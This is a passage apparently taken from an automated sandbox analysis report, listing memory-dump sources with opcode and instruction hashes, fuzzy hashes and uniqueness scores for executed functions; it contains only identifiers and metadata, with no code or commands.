• Opcode ID: 6b6f00791207c5493c5a327c8f9643fe8de3a6d27fbf4b0e64130316b3efad45
• Instruction ID: 32942690430fe3bb9dd140979e809abc80a92f72e3b506fb9baf7671c0cb1610
• Opcode Fuzzy Hash: 6b6f00791207c5493c5a327c8f9643fe8de3a6d27fbf4b0e64130316b3efad45
• Instruction Fuzzy Hash: 5A417E1060EBC64FE7539738586A6B57FF09F57210B1A00E7D488CB1A3D9589D49C7A3
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2125837651.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
• Similarity: API ID, String ID and API String ID empty (no API or string matches recorded)
• Opcode ID: e71e12b27161e7403694d4a4d4f42d07d8a95aff4904a63b323e407ccb2c87b9
• Instruction ID: 7dabbabf765e9989507a12f0764f6d849c42be9cb0aee42d5836f5a977ea7740
• Opcode Fuzzy Hash: e71e12b27161e7403694d4a4d4f42d07d8a95aff4904a63b323e407ccb2c87b9
• Instruction Fuzzy Hash: A7F0E22140E3C58FD3039B789C654847FB0AE47254B4A06DBD884CF0B3E21C1AA8C763
• Uniqueness Score: -1.00%

Non-executed Functions: none listed

Executed Functions

Memory Dump Source
• Source File: 00000009.00000002.2161463199.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
• Similarity: API ID, String ID and API String ID empty (no API or string matches recorded)
• Opcode ID: 08fce486515753f9a267849b020b335a73f3593e5255a95f48c36deab500af23
• Instruction ID: 046aab66ffa8a8603c6489c32547ef780c47b32581acda7d918a50efb57e1ba1
• Opcode Fuzzy Hash: 08fce486515753f9a267849b020b335a73f3593e5255a95f48c36deab500af23
• Instruction Fuzzy Hash: 79413361A0EBD60FD7039B386C656A17FB0AF97214B0A02E7D488CF0E3D51D4E5AC362
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.2161463199.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
• Similarity: API ID, String ID and API String ID empty (no API or string matches recorded)
• Opcode ID: e9590d7178305f3a6995589f2c417e04bc632b60e4fd06033736d876b68269eb
• Instruction ID: 4f3e75f022261eb8d6a55b5c34527809d9690a7742d3980f6e370fef96b66cd6
• Opcode Fuzzy Hash: e9590d7178305f3a6995589f2c417e04bc632b60e4fd06033736d876b68269eb
• Instruction Fuzzy Hash: 5301446195E7D54FD30357745C6AAA13FB15F17210F1A02DBD584CF0A3D28D4A89D3A2
• Uniqueness Score: -1.00%

Non-executed Functions: none listed

Executed Functions

Memory Dump Source
• Source File: 0000000B.00000002.2168676349.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
• Similarity: API ID, String ID and API String ID empty (no API or string matches recorded)
• Opcode ID: 92244aba76804312bfac89e6d88ccc613308891ef8c1cb1f05d99d9cffe4019c
• Instruction ID: 981d23bf3291bb38d7f5aee097dd7a9782e796792e6c4a32ee5f0c67a50f8252
• Opcode Fuzzy Hash: 92244aba76804312bfac89e6d88ccc613308891ef8c1cb1f05d99d9cffe4019c
• Instruction Fuzzy Hash: E001D0A184E7C14FD30387785C296917FB0AF93248F0E02DBD4C4CE0B3E549095AC362
• Uniqueness Score: -1.00%

Non-executed Functions: none listed